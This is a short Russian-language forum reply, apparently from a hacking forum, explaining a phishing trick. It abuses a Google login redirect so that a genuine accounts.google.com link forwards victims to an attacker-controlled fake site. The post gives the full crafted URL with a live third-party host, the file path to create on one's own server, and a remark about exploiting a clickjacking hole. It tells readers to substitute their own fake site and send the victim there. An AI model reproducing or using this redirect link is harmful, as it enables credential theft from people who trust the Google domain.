29.09.2018, 15:42
|
|
Новичок
Регистрация: 09.12.2016
Сообщений: 0
С нами:
4961332
Репутация:
0
|
|
Vander сказал(а):
Можно было бы и своими словами рассказать, а не просто ссылку кидать.
а че тут рассказывать не понял, надо создать по такому пути https:// тут ваш сайт/_ah/conflogin/ файл index.html
ссылка будет такая:
Код:
Код:
https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fappengine.google.com%2F_ah%2Fconflogin%3Fcontinue%3Dhttp://create-wizard.esy.es/_ah/conflogin/%2F&service=ah
на сайте автора есть уязвимость под Clickjacking просто примотал к его сайту модалку все..ниже как пример
вот сам код тыц внизу просто меняем на свой сайт-фейк шлем жертву куда надо,там же меняете ссылку на файл.....
|
|
|